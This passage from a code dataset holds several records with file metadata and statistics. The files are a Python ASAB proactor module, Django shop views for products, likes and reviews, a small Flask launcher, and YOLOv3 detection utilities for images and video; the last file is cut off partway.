    label_img = cv2.resize(img, dsize=(shape, shape), interpolation=cv2.INTER_NEAREST)
    return label_img
| 43.329091 | 123 | 0.537745 | 2,868 | 23,831 | 4.22106 | 0.078103 | 0.092186 | 0.087725 | 0.050884 | 0.771849 | 0.748885 | 0.733355 | 0.723608 | 0.704279 | 0.677928 | 0 | 0.023089 | 0.340271 | 23,831 | 549 | 124 | 43.408015 | 0.746915 | 0.074105 | 0 | 0.676538 | 0 | 0 | 0.067219 | 0.001165 | 0 | 0 | 0 | 0 | 0.002278 | 1 | 0.01139 | false | 0 | 0.047836 | 0 | 0.070615 | 0.009112 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5 |
e58484894c5f43692fe7341a176dcb84807da1d8 | 467 | py | Python | asab/proactor/__init__.py | TeskaLabs/asab | f28894b62bad192d8d30df01a8ad1b842ee2a2fb | [
"BSD-3-Clause"
] | 23 | 2018-03-07T18:58:13.000Z | 2022-03-29T17:11:47.000Z | asab/proactor/__init__.py | TeskaLabs/asab | f28894b62bad192d8d30df01a8ad1b842ee2a2fb | [
"BSD-3-Clause"
] | 87 | 2018-04-04T19:44:13.000Z | 2022-03-31T11:18:00.000Z | asab/proactor/__init__.py | TeskaLabs/asab | f28894b62bad192d8d30df01a8ad1b842ee2a2fb | [
"BSD-3-Clause"
] | 10 | 2018-04-30T16:40:25.000Z | 2022-03-09T10:55:24.000Z | import logging
import asab
from .service import ProactorService
# Module-level logger for the proactor module.
L = logging.getLogger(__name__)

# Default configuration for the "[asab:proactor]" section.
# 'max_workers' is '0' — presumably "let the executor size itself";
# confirm against ProactorService. 'default_executor' = True installs
# the proactor as the loop's default executor (TODO confirm in service).
asab.Config.add_defaults(
	{
		'asab:proactor': {
			'max_workers': '0',
			'default_executor': True,
		}
	}
)
class Module(asab.Module):
	'''
	ASAB module providing the proactor pattern on top of
	``loop.run_in_executor()``: blocking work is off-loaded to an
	executor so the asyncio event loop stays responsive.

	https://en.wikipedia.org/wiki/Proactor_pattern
	'''

	def __init__(self, app):
		super().__init__(app)
		# Register the service under its canonical "asab.ProactorService" name.
		self.service = ProactorService(app, "asab.ProactorService")
| 14.59375 | 61 | 0.704497 | 56 | 467 | 5.553571 | 0.660714 | 0.096463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002532 | 0.154176 | 467 | 31 | 62 | 15.064516 | 0.78481 | 0.205567 | 0 | 0 | 0 | 0 | 0.170391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.1875 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5851888f1c433217aef830313dc07ac613ce867 | 13,266 | py | Python | mywebsite/shop/views.py | Zadigo/ecommerce_template | a4572c3faeaeb9cd399351c0fd1f19a4ef94de27 | [
"MIT"
] | 16 | 2020-07-01T03:42:40.000Z | 2022-02-21T21:02:27.000Z | mywebsite/shop/views.py | Zadigo/ecommerce_template | a4572c3faeaeb9cd399351c0fd1f19a4ef94de27 | [
"MIT"
] | 14 | 2020-11-19T18:55:28.000Z | 2022-02-01T22:08:23.000Z | mywebsite/shop/views.py | Zadigo/ecommerce_template | a4572c3faeaeb9cd399351c0fd1f19a4ef94de27 | [
"MIT"
] | 7 | 2020-06-30T23:55:36.000Z | 2021-11-12T00:06:40.000Z | """
Conversion Tunnel
------
checkout > shipment > payment > success
Payment process
-------
1. On submitting the form, an AJAX request is
done using Stripe in order to get the token
2. An intermediate view is used afterwards to
process the payment on the backend side
3. If the payment was successful, a redirect is
done to the SuccessView
"""
import json
import random
from cart import models as cart_models
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core import cache, paginator
from django.db import transaction
from django.db.models.aggregates import Avg
from django.http.response import Http404, HttpResponseForbidden, JsonResponse
from django.shortcuts import get_object_or_404, redirect, render, reverse
from django.utils.decorators import method_decorator
from django.utils.translation import gettext
from django.utils.translation import gettext_lazy as _
from django.views.decorators.cache import cache_page, never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from django.views.generic import DetailView, ListView, TemplateView, View
from shop import models, serializers, sizes, tasks, utilities
def create_vue_products(queryset):
    """Serialize products into plain dicts consumable by the Vue front end.

    Each dict carries the product's scalar fields, its collection name,
    string-converted prices, and its related images/variants as lists of
    value dicts.
    """
    def _as_dict(product):
        # One flat dict per product; prices go out as strings.
        return {
            'id': product.id,
            'reference': product.reference,
            'url': product.get_absolute_url(),
            'collection': {
                'name': product.collection.name
            },
            'name': product.name,
            'price': str(product.get_price()),
            'main_image': product.get_main_image_url,
            'images': list(product.images.values('id', 'name', 'url', 'web_url', 'variant', 'main_image')),
            'variant': list(product.variant.values('id', 'name', 'verbose_name', 'in_stock', 'active')),
            'in_stock': product.in_stock,
            'our_favorite': product.our_favorite,
            'is_discounted': product.is_discounted,
            'price_pre_tax': str(product.price_pre_tax),
            'discounted_price': str(product.discounted_price),
            'slug': product.slug
        }

    return [_as_dict(product) for product in queryset]
@method_decorator(cache_page(60 * 30), name='dispatch')
class IndexView(View):
    """Landing page of the shop; the response is cached for 30 minutes."""

    def get(self, request, *args, **kwargs):
        return render(request, 'pages/shop.html')
@method_decorator(cache_page(60 * 15), name='dispatch')
class ShopGenderView(View):
    """Shop discovery page per category (e.g. gender); cached for 15 minutes.

    Shows up to three collections whose ``gender`` field matches the
    ``gender`` URL keyword argument (compared title-cased).
    """

    def get(self, request, *args, **kwargs):
        context = {}
        gender = kwargs.get('gender')
        # URL kwarg is matched title-cased against Collection.gender.
        collections = models.Collection.objects.filter(
            gender=gender.title()
        )
        if collections.exists():
            # Only the first three collections are surfaced on this page.
            context = {'collections': collections[:3]}
        return render(request, 'pages/shop_gender.html', context)
class ProductsView(ListView):
    """Paginated product listing for one collection.

    The collection is resolved from the ``collection`` URL kwarg; the
    optional ``category`` query parameter narrows the results down to
    promotions or staff favorites.
    """

    model = models.Collection
    template_name = 'pages/collections.html'
    context_object_name = 'products'
    paginate_by = 12
    ordering = '-created_on'

    # Query-parameter values that map to extra queryset filters; 'all',
    # unknown values and a missing parameter keep the full queryset.
    _CATEGORY_FILTERS = {
        'promos': {'discounted': True},
        'favorites': {'our_favorite': True},
    }

    def get_queryset(self, **kwargs):
        """Return active, public products of the requested collection.

        :raises Http404: when the collection does not exist.
        """
        view_name = self.kwargs.get('collection')
        try:
            collection = self.model.objects.get(view_name__exact=view_name)
        except self.model.DoesNotExist:
            # Bug fix: a bare ``except:`` here also swallowed programming
            # errors (and even KeyboardInterrupt) as a 404.
            raise Http404("La collection n'existe pas")
        queryset = collection.product_set.filter(active=True, private=False)
        category = self.request.GET.get('category', None)
        return queryset.filter(**self._CATEGORY_FILTERS.get(category, {}))

    def get_context_data(self, **kwargs):
        """Attach pagination state, Vue-serialized products and the collection."""
        context = super().get_context_data(**kwargs)
        products = self.get_queryset(**kwargs)
        # Set a specific pagination number to active depending on which
        # page we are.
        context['current_active_page'] = self.request.GET.get('page', 1)
        page_paginator = super().get_paginator(products, self.paginate_by)
        # Specific technique in order to include the product url,
        # main_image url and images for the Vue app. (The previous cache
        # layer here was dead commented-out code and has been removed.)
        vue_products = create_vue_products(page_paginator.object_list)
        context['vue_products'] = json.dumps(vue_products)
        context['collection'] = self.model.objects.get(
            view_name__exact=self.kwargs.get('collection'),
            gender=self.kwargs.get('gender').title()
        )
        return context
@method_decorator(cache_page(60 * 15), name='dispatch')
class ProductView(DetailView):
    """Product detail page; responses are cached for 15 minutes."""

    model = models.Product
    template_name = 'pages/product.html'
    context_object_name = 'product'

    def post(self, request, **kwargs):
        """Add the displayed product to the visitor's cart.

        Returns ``{'state': True}`` on success; otherwise ``{'state': False}``
        plus a flashed error message.
        """
        product = super().get_object()
        # TODO: Add a method function that prevents triggering the rest
        # of the method with any kinds of post requests
        added = cart_models.Cart.cart_manager.add_to_cart(request, product)
        if not added:
            messages.error(
                request,
                "Une erreur s'est produite - ADD-CA",
                extra_tags='alert-danger'
            )
        return JsonResponse(data={'state': bool(added)})

    def get_queryset(self, **kwargs):
        """Expose every product."""
        return self.model.objects.all()

    def get_context_data(self, **kwargs):
        """Attach the serialized product, suggestions, like state and reviews."""
        context = super().get_context_data(**kwargs)
        product = super().get_object()
        context['vue_product'] = serializers.ProductSerializer(instance=product).data
        # Up to three other active products shown as suggestions.
        context['more'] = (
            self.model.objects
            .prefetch_related('images')
            .filter(active=True)
            .exclude(id=product.id)[:3]
        )
        user = self.request.user
        context['has_liked'] = bool(
            user.is_authenticated
            and models.Like.objects.filter(product=product, user=user).exists()
        )
        reviews = product.review_set.all()
        context['reviews'] = reviews
        context['reviews_avg'] = reviews.aggregate(Avg('rating'))
        return context
@method_decorator(never_cache, name='dispatch')
class PreviewProductView(LoginRequiredMixin, DetailView):
    """Admin-only preview of a product in the semi-original context of the
    main product page. Never cached."""

    model = models.Product
    queryset = models.Product.objects.all()
    template_name = 'pages/preview.html'
    context_object_name = 'product'
    http_method_names = ['get']

    def get(self, request, *args, **kwargs):
        """Serve the preview, rejecting non-admin users with a 403."""
        response = super().get(request, *args, **kwargs)
        if not request.user.is_admin:
            return HttpResponseForbidden('You are not authorized on this page')
        return response

    def get_context_data(self, **kwargs):
        """Expose the serialized product for the Vue component."""
        context = super().get_context_data(**kwargs)
        context['vue_product'] = serializers.ProductSerializer(
            instance=super().get_object()
        ).data
        return context
@method_decorator(cache_page(60 * 30), name='dispatch')
@method_decorator(csrf_exempt, name='dispatch')
class PrivateProductView(DetailView):
    """Unlisted product page that does not appear in the main site's urls.

    Perfect for testing a product from a marketing perspective.
    """

    model = models.Product
    queryset = models.Product.product_manager.private_products()
    template_name = 'pages/product.html'
    context_object_name = 'product'

    def post(self, request, **kwargs):
        """Add the private product to the cart; respond with 400 on failure."""
        product = super().get_object()
        # TODO: Add a method function that prevents triggering the rest
        # of the method with any kinds of post requests
        added = cart_models.Cart.cart_manager.add_to_cart(request, product)
        if added:
            return JsonResponse(data={'success': 'success'})
        return JsonResponse(data={'failed': 'missing parameters'}, status=400)

    def get_context_data(self, **kwargs):
        """Expose the serialized product for the Vue component."""
        context = super().get_context_data(**kwargs)
        context['vue_product'] = serializers.ProductSerializer(
            instance=super().get_object()
        ).data
        return context
class SearchView(ListView):
    """Product search results page."""

    model = models.Product
    template_name = 'pages/search.html'
    context_object_name = 'products'
    paginate_by = 10

    def get_queryset(self, **kwargs):
        """Return products matching the ``q`` query parameter.

        An empty list is returned when no search term was provided so the
        template still receives an iterable.
        """
        searched_item = self.request.GET.get('q')
        if searched_item is None:
            return []
        return self.model.product_manager.search_product(searched_item)

    def get_context_data(self, **kwargs):
        """Attach Vue-serialized results and a random proposed collection."""
        context = super().get_context_data(**kwargs)
        # Bug fix: the original evaluated get_queryset() twice and left the
        # first result in an unused local; evaluate it once.
        results = self.get_queryset(**kwargs)
        page_paginator = super().get_paginator(results, self.paginate_by)
        context['vue_products'] = serializers.ProductSerializer(
            instance=page_paginator.object_list, many=True
        ).data
        # TODO: pick the proposed collection in a smarter way.
        random_collection = random.choice(['tops', 'pantalons'])
        collection = models.Collection.objects.get(view_name=random_collection)
        context['proposed_products'] = collection.product_set.all()[:4]
        return context
# Static informational page; safe to cache for a full hour.
@method_decorator(cache_page(60 * 60), name='dispatch')
class SizeGuideView(TemplateView):
    """View for providing the customer with information
    on sizes etc."""
    template_name = 'pages/size_guide.html'
@require_POST
@transaction.atomic
def add_like(request, **kwargs):
    """Add a like on the product identified by the ``pk`` URL kwarg.

    Returns ``{'state': True}`` when a like was created,
    ``{'state': False}`` when the user already liked the product, and
    ``{'state': False, 'redirect_url': ...}`` for anonymous users so the
    front end can send them to the login page.
    """
    data = {'state': False}
    product = get_object_or_404(models.Product, id=kwargs['pk'])
    if request.user.is_authenticated:
        likes = product.like_set.filter(user=request.user)
        if likes.exists():
            # Already liked: nothing to create.
            return JsonResponse(data=data)
        product.like_set.create(user=request.user)
        # Bug fix: the success case previously still reported state=False,
        # making it indistinguishable from "already liked" (compare with
        # add_review, which reports state=True on success).
        data['state'] = True
    else:
        redirect_url = f"{reverse('accounts:login')}?next={product.get_absolute_url()}"
        data.update({'redirect_url': redirect_url})
    return JsonResponse(data=data)
@require_POST
def size_calculator(request, **kwargs):
    """Calculate from the customer's measurements the correct size for
    him/her.

    Expects ``bust`` and ``chest`` POST fields. Returns
    ``{'state': False}`` when either value is missing or non-numeric.
    """
    bust = request.POST.get('bust')
    chest = request.POST.get('chest')
    # Bug fix: the original only bailed out when BOTH values were missing
    # ("and"), so a single missing value crashed below on int(None).
    if bust is None or chest is None:
        return JsonResponse(data={'state': False})
    try:
        bust = int(bust)
        chest = int(chest)
    except ValueError:
        # Non-numeric form input must not produce a 500.
        return JsonResponse(data={'state': False})
    calculator = sizes.BraCalculator(bust, chest)
    data = {
        'state': True,
        'result': calculator.get_full_bra_size,
        'size': calculator.size,
        'cup': calculator.cup
    }
    return JsonResponse(data=data)
@require_POST
@transaction.atomic
def add_review(request, **kwargs):
    """Create a review for the product identified by the ``pk`` URL kwarg.

    Anonymous users receive the failure payload unchanged.
    """
    score = request.POST.get('score')
    text = request.POST.get('text')
    if not request.user.is_authenticated:
        return JsonResponse(data={
            'state': False,
            'message': "L'avis n'a pas pu être créé"
        })
    product = get_object_or_404(models.Product, id=kwargs.get('pk'))
    product.review_set.create(
        user=request.user,
        text=text,
        rating=score
    )
    return JsonResponse(data={
        'state': True,
        'message': "Votre avis a été créé"
    })
| 34.546875 | 99 | 0.635761 | 1,509 | 13,266 | 5.45063 | 0.224652 | 0.017021 | 0.017021 | 0.01459 | 0.349787 | 0.304681 | 0.230881 | 0.210456 | 0.190517 | 0.169362 | 0 | 0.005388 | 0.25848 | 13,266 | 383 | 100 | 34.637076 | 0.830741 | 0.144957 | 0 | 0.332046 | 0 | 0 | 0.095558 | 0.011284 | 0 | 0 | 0 | 0.005222 | 0 | 1 | 0.065637 | false | 0 | 0.069498 | 0.003861 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e585e2842a0d58243451c36eb2f3bb53a795288e | 245 | py | Python | docker/dataset/stock_analysis/run.py | jojees/operations | bb1a242efbbf56c9afbe4b9e4b5aa14218720e2b | [
"MIT"
] | null | null | null | docker/dataset/stock_analysis/run.py | jojees/operations | bb1a242efbbf56c9afbe4b9e4b5aa14218720e2b | [
"MIT"
] | 2 | 2019-09-22T11:24:19.000Z | 2019-09-22T11:38:49.000Z | docker/dataset/stock_analysis/run.py | jojees/operations | bb1a242efbbf56c9afbe4b9e4b5aa14218720e2b | [
"MIT"
] | null | null | null | """Application entry point."""
from webapp import init_app
# Build the application via the webapp package's factory function.
app = init_app()
# Using a development configuration
app.config.from_object('config.DevConfig')
# print(app.config)
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=False) | 22.272727 | 42 | 0.722449 | 36 | 245 | 4.611111 | 0.666667 | 0.036145 | 0.036145 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018605 | 0.122449 | 245 | 11 | 43 | 22.272727 | 0.753488 | 0.314286 | 0 | 0 | 0 | 0 | 0.191358 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e585fd72caa5f846d1fe6076b952b19c250c6439 | 19,169 | py | Python | utils/yolo_utils.py | Dishoungh/martrec | 74d0cffa3c046509017e1fd121a474ee5b50a194 | [
"MIT"
] | null | null | null | utils/yolo_utils.py | Dishoungh/martrec | 74d0cffa3c046509017e1fd121a474ee5b50a194 | [
"MIT"
] | 1 | 2021-01-28T16:57:41.000Z | 2021-01-28T18:13:34.000Z | utils/yolo_utils.py | Dishoungh/martrec | 74d0cffa3c046509017e1fd121a474ee5b50a194 | [
"MIT"
] | null | null | null | import numpy as np
import cv2 as cv
import time
import os
import sys
import multiprocessing
def init(labelfile, config, weights):
    """Load class labels, per-class colors and the pretrained YOLOv3 net.

    :param labelfile: path to a newline-separated class-name file
    :param config: path to the darknet .cfg file
    :param weights: path to the darknet .weights file
    :return: (labels, colors, net, output_layer_names)
    """
    # Get the labels. Bug fix: use a context manager so the file handle is
    # not leaked (the original called open() without ever closing it).
    with open(labelfile) as handle:
        labels = handle.read().strip().split('\n')
    # Initializing colors to represent each label uniquely
    colors = np.random.randint(0, 255, size=(len(labels), 3), dtype='uint8')
    # Load the weights and configuration to form the pretrained YOLOv3 model
    net = cv.dnn.readNetFromDarknet(config, weights)
    # Get the output layer names of the model
    layer_names = net.getLayerNames()
    layer_names = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
    return labels, colors, net, layer_names
def parse_input_path(input_path):
    """Return the media file names (images/videos) found in *input_path*.

    Matching is by file extension, case-insensitively. Bug fix: the
    original used substring tests (e.g. ``'jpeg' in path``), which wrongly
    matched names such as 'clip.jpeg.bak' and missed upper-case extensions.
    """
    media_suffixes = ('.png', '.jpg', '.jpeg', '.mp4', '.avi')
    return [
        path for path in os.listdir(input_path)
        if path.lower().endswith(media_suffixes)
    ]
def start_yolo_process(args):
    """Wrap every file in ``args.input_path`` in a yolo_process worker and run them.

    ``args`` must provide: input_path, processed_folder, labels, config,
    weights, output_path, delay_time, save_video, option, video_output_path,
    confidence and threshold. The ``tag`` list deduplicates input paths so
    each file is wrapped in exactly one Process even though the idx/pid
    windows overlap.
    """
    fileslist = parse_input_path(args.input_path)
    processes = []
    tag = []  # input paths already wrapped in a Process (dedup guard)
    # Parse through Input Data Folder
    for idx, file in enumerate(fileslist):
        pid = 0
        # NOTE(review): the second clause (idx < len) is always true inside
        # this for loop; the real bounds check is the if just below.
        while ((pid < multiprocessing.cpu_count()) and (idx < len(fileslist))):
            if ((idx + pid) < len(fileslist)):
                # Create Processes
                try:
                    tFile = fileslist[idx+pid]
                    in_path = str(args.input_path + tFile)
                    processed_path = str(args.processed_folder + tFile)
                    # Positional arguments mirror yolo_process's signature;
                    # gui=False / gui_obj=None because this is the CLI path.
                    arguments = (tFile,
                                 in_path,
                                 processed_path,
                                 tFile[:tFile.find('.')],
                                 args.labels,
                                 args.config,
                                 args.weights,
                                 args.output_path,
                                 args.delay_time,
                                 args.save_video,
                                 args.option,
                                 args.video_output_path,
                                 args.confidence,
                                 args.threshold,
                                 pid,
                                 False,
                                 None)
                    process = multiprocessing.Process(target=yolo_process, args=arguments)
                    if in_path not in tag:
                        processes.append(process)
                        tag.append(in_path)
                except Exception as err:
                    print("[ERROR] {e}".format(e=err))
            pid += 1
    # Execute Processes
    for process in processes:
        try:
            process.start()
        except Exception as err:
            print("[ERROR] {e}".format(e=err))
    for process in processes:
        try:
            process.join()
        except Exception as err:
            print("[ERROR] {e}".format(e=err))
    processes.clear()
def yolo_process(file, file_path, done_path, output_name, labels, config, weights, save_path, delay_time, save_video, option, video_output_path, confidence, threshold, process_id, gui, gui_obj):
    """Run YOLO inference on one input file (image, video or webcam fallback).

    :param file: bare file name (currently unused inside the function)
    :param file_path: full input path; its extension selects the mode
    :param done_path: where the input is moved (os.rename) once processed
    :param output_name: base name for saved detection images
    :param labels: path to the label file (rebound to the label list by init)
    :param config: darknet .cfg path
    :param weights: darknet .weights path
    :param save_path: directory prefix for saved images
    :param delay_time: number of frames skipped between inference runs
    :param save_video: when True, every labeled frame is written to
        video_output_path
    :param option: 0 save raw / 1 save labeled / 2 both / 3 vertical collage
    :param video_output_path: output path for the annotated video
    :param confidence: minimum detection confidence
    :param threshold: non-maxima-suppression threshold
    :param process_id: worker id forwarded to the progress bar
    :param gui: when True, gui_obj.bar is updated with percent progress
    :param gui_obj: object exposing a progress ``bar`` widget (only if gui)
    """
    image_path = None
    video_path = None
    if ('.png' in file_path) or ('.jpg' in file_path) or ('.jpeg' in file_path):
        image_path = file_path
    if ('.mp4' in file_path) or ('.avi' in file_path):
        video_path = file_path
    # Initialize labels, colors, and pretrain model
    try:
        labels, colors, net, layer_names = init(labels,
                                                config,
                                                weights)
    except Exception as err:
        print("[ERROR] {e}".format(e=err))
    # If both image and video files are given then raise error
    if image_path is None and video_path is None:
        print('[WARNING] Neither path to an image or path to video provided. Starting Inference on Webcam...')
    # Do inference with given image
    if image_path:
        print('[INFO] Starting image processing of {ip}...'.format(ip=str(image_path)))
        if not os.path.exists(image_path):
            print("[ERROR] Image path does not exist. Exiting...")
            sys.exit()
        # Read the image
        try:
            img = cv.imread(image_path)
            height, width = img.shape[:2]
        except:
            raise Exception('[ERROR] Image cannot be loaded!\n'
                            'Please check the path provided!')
        finally:
            # NOTE(review): this finally block runs even when the except
            # branch raised, so a failed read still attempts inference —
            # consider an else block instead.
            img, _, _, _, _, _, _, _, _ = infer_image(net, layer_names, height, width, img, colors, labels, confidence, threshold)
            save_image(img, output_name, save_path)
            os.rename(file_path, done_path)
    elif video_path:
        print('[INFO] Starting video processing of {vp}...'.format(vp=str(video_path)))
        if output_name is None:
            print("[ERROR] No output name specified. Exiting...")
            sys.exit()
        if not os.path.exists(video_path):
            print("[ERROR] Video path does not exist. Exiting...")
            sys.exit()
        # Read the video
        try:
            vid = cv.VideoCapture(video_path)
            boxHeight, boxWidth = 0, 0
            height, width = None, None
            writer = None
        except:
            raise Exception('[ERROR] Video cannot be loaded!\n'
                            'Please check the path provided!')
        finally:
            # Per-frame wall-clock timings used for the ETA in the progress bar.
            timings = np.array([])
            # Will attempt to count the number of frames in the video,
            # This is dependent on the OpenCV version
            try:
                total = int(vid.get(cv.CAP_PROP_FRAME_COUNT))
            except:
                try:
                    total = int(vid.get(cv.CV_CAP_PROP_FRAME_COUNT))
                except:
                    print("[WARNING] Have to count frames manually. This might take a while...")
                    total = count_frames_manual(vid)
                    print("[SUCCESS] Count complete...")
            delay = delay_time
            num_images = 0
            # Scan each frame in video
            while True:
                grabbed, raw_frame = vid.read()
                try:
                    labeled_frame = raw_frame.copy()
                except:
                    # raw_frame is None when the stream ends.
                    labeled_frame = None
                # Checking if the complete video is read
                if not grabbed:
                    break
                if width is None or height is None:
                    height, width = labeled_frame.shape[:2]
                if writer is None and save_video is True:
                    # Initialize the video writer
                    fourcc = cv.VideoWriter_fourcc(*"MJPG")
                    writer = cv.VideoWriter(video_output_path, fourcc, 30,
                                            (labeled_frame.shape[1], labeled_frame.shape[0]), True)
                # Time frame inference and show progress
                start = time.time()
                # Inference only runs every delay_time frames.
                if delay <= 0 and labeled_frame is not None:
                    labeled_frame, _, _, classids, _, xPos, yPos, boxWidth, boxHeight = infer_image(net,
                                                                                                   layer_names,
                                                                                                   height,
                                                                                                   width,
                                                                                                   labeled_frame,
                                                                                                   colors,
                                                                                                   labels,
                                                                                                   confidence,
                                                                                                   threshold)
                    try:
                        obj = labels[classids[0]]
                    except:
                        # No detections this frame.
                        obj = None
                    # Descriptions of a typical freight truck
                    if (((obj == 'truck') and (boxWidth >= (boxHeight * 1.5))
                            and (boxHeight >= 0.4 * height)
                            and (boxWidth >= 0.7 * width))):
                        # Extract Timestamp from Video (TODO: Explore with this: https://www.geeksforgeeks.org/text-detection-and-extraction-using-opencv-and-ocr/)
                        try:
                            modified_name = output_name + ('_{time}'.format(time=str(int(vid.get(cv.CAP_PROP_POS_MSEC)))))
                            # print(modified_name)
                        except:
                            # print("[ERROR] Failed to get timestamp of video")
                            modified_name = output_name + '_?'
                        #report_image_attributes(modified_name, xPos, boxWidth, boxHeight, width, height)
                        if (option == 0) or (option == 2):  # Save raw image
                            save_image(raw_frame, modified_name, save_path, True)
                            num_images += 1
                        if (option == 1) or (option == 2):  # Save labeled image
                            save_image(labeled_frame, modified_name, save_path, False)
                            num_images += 1
                        if (option == 3):  # Save Collage
                            try:
                                collage_name = str(modified_name + "_collage.png")
                                primary = raw_frame
                                # Capture secondary frame (10 frames over)
                                for i in range(10):
                                    _, secondary = vid.read()
                                # Put two images vertically on a collage
                                save_image(np.vstack([primary, secondary]), collage_name, save_path, True)
                                num_images += 1
                            except Exception as err:
                                print("[ERROR] {e}".format(e=err))
                    # Re-arm the frame-skip counter after an inference run.
                    delay = delay_time
                delay -= 1
                if save_video is True:
                    writer.write(labeled_frame)
                end = time.time()
                timings = np.append(timings, (end - start))
                show_progress_bar(timings.size, total, num_images, np.average(timings), output_name, process_id)
                # Return progress bar value
                if gui is True:
                    gui_obj.bar['value'] = (timings.size / total) * 100
                    gui_obj.bar.update_idletasks()
            # End process
            print("\n[INFO] Cleaning up...")
            if writer is not None:
                writer.release()
            vid.release()
            os.rename(file_path, done_path)
    else:
        # Infer real-time on webcam
        count = 0
        vid = cv.VideoCapture(0)
        while True:
            _, frame = vid.read()
            height, width = frame.shape[:2]
            if count == 0:
                # Full inference on the first frame of every 6-frame window.
                frame, boxes, confidences, classids, index, _, _, _, _ = infer_image(net,
                                                                                     layer_names,
                                                                                     height,
                                                                                     width,
                                                                                     frame,
                                                                                     colors,
                                                                                     labels,
                                                                                     confidence,
                                                                                     threshold)
                count += 1
            else:
                # Reuse the previous detections for the next 5 frames.
                frame, boxes, confidences, classids, index, _, _, _, _ = infer_image(net,
                                                                                     layer_names,
                                                                                     height,
                                                                                     width,
                                                                                     frame,
                                                                                     colors,
                                                                                     labels,
                                                                                     confidence,
                                                                                     threshold,
                                                                                     boxes,
                                                                                     confidences,
                                                                                     classids,
                                                                                     index,
                                                                                     infer=False)
                count = (count + 1) % 6
            cv.imshow('webcam', frame)
            if cv.waitKey(1) & 0xFF == ord('q'):
                break
        vid.release()
        cv.destroyAllWindows()
    print("[SUCCESS] Image Processing Complete...")
def report_image_attributes(modified_name, xPos, boxWidth, boxHeight, width, height):
    """Dump a detection's name, position and geometry to stdout (debug aid)."""
    report_lines = (
        f"Name: {modified_name}",
        f"X Position: {xPos}",
        f"BoxWidth: {boxWidth}",
        f"BoxHeight: {boxHeight}",
        f"Image Width: {width}",
        f"Image Height: {height}\n\n",
    )
    for line in report_lines:
        print(line)
def save_image(img, output_name, save_path, raw=False):
    """Write *img* under *save_path*, picking the first free numbered name.

    Files are named ``<output_name>_<n>_raw.png`` or
    ``<output_name>_<n>_labeled.png``. Bug fix: ``raw`` previously had no
    default, yet the image branch of yolo_process calls save_image() with
    three arguments (and that image is the labeled one), which raised a
    TypeError; it now defaults to False.
    """
    num = 1
    while True:
        suffix = 'raw' if raw is True else 'labeled'
        filename = '{s}{o}_{n}_{k}.png'.format(s=save_path, o=output_name, n=num, k=suffix)
        if os.path.isfile(filename):
            # Name already taken: try the next index.
            num += 1
        else:
            cv.imwrite(filename, img)
            break
def draw_labels_and_boxes(img, boxes, confidences, classids, idxs, colors, labels):
    """Draw every kept detection on *img* and return it with the last box.

    Returns ``(img, x, y, w, h)`` where x/y/w/h describe the final box that
    was drawn, or four zeros when there were no detections.
    """
    x = y = w = h = 0
    if len(idxs) > 0:
        for i in idxs.flatten():
            # Bounding-box coordinates of this detection.
            x, y, w, h = boxes[i][0], boxes[i][1], boxes[i][2], boxes[i][3]
            # Stable per-class color.
            color = [int(channel) for channel in colors[classids[i]]]
            cv.rectangle(img, (x, y), (x + w, y + h), color, 2)
            caption = "{}: {:4f}".format(labels[classids[i]], confidences[i])
            cv.putText(img, caption, (x, y - 5), cv.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
    return img, x, y, w, h
def generate_boxes_confidences_classids(outs, height, width, tconf):
    """Convert raw YOLO layer outputs into pixel-space boxes.

    :param outs: iterable of detection arrays (one per output layer); each
        row is ``[cx, cy, w, h, objectness, class scores...]``
    :param height: image height used to scale the normalized coordinates
    :param width: image width used to scale the normalized coordinates
    :param tconf: minimum class confidence for a detection to be kept
    :return: ``(boxes, confidences, classids)`` parallel lists, each box
        being ``[top_left_x, top_left_y, box_width, box_height]``
    """
    boxes, confidences, classids = [], [], []
    scale = np.array([width, height, width, height])
    for out in outs:
        for detection in out:
            # Class scores start after [cx, cy, w, h, objectness].
            scores = detection[5:]
            classid = np.argmax(scores)
            confidence = scores[classid]
            # Keep only sufficiently confident predictions.
            if confidence > tconf:
                centerX, centerY, bwidth, bheight = (detection[0:4] * scale).astype('int')
                # Convert the center point into the top-left corner.
                boxes.append([int(centerX - (bwidth / 2)),
                              int(centerY - (bheight / 2)),
                              int(bwidth), int(bheight)])
                confidences.append(float(confidence))
                classids.append(classid)
    return boxes, confidences, classids
def infer_image(net, layer_names, height, width, img, colors, labels, confidence, threshold,
                boxes=None, confidences=None, classids=None, idxs=None, infer=True):
    """Run (or reuse) a YOLO forward pass and draw the detections on *img*.

    With ``infer=True`` a fresh forward pass is performed; with
    ``infer=False`` the previously computed boxes/confidences/classids/idxs
    are reused (frame skipping). Returns
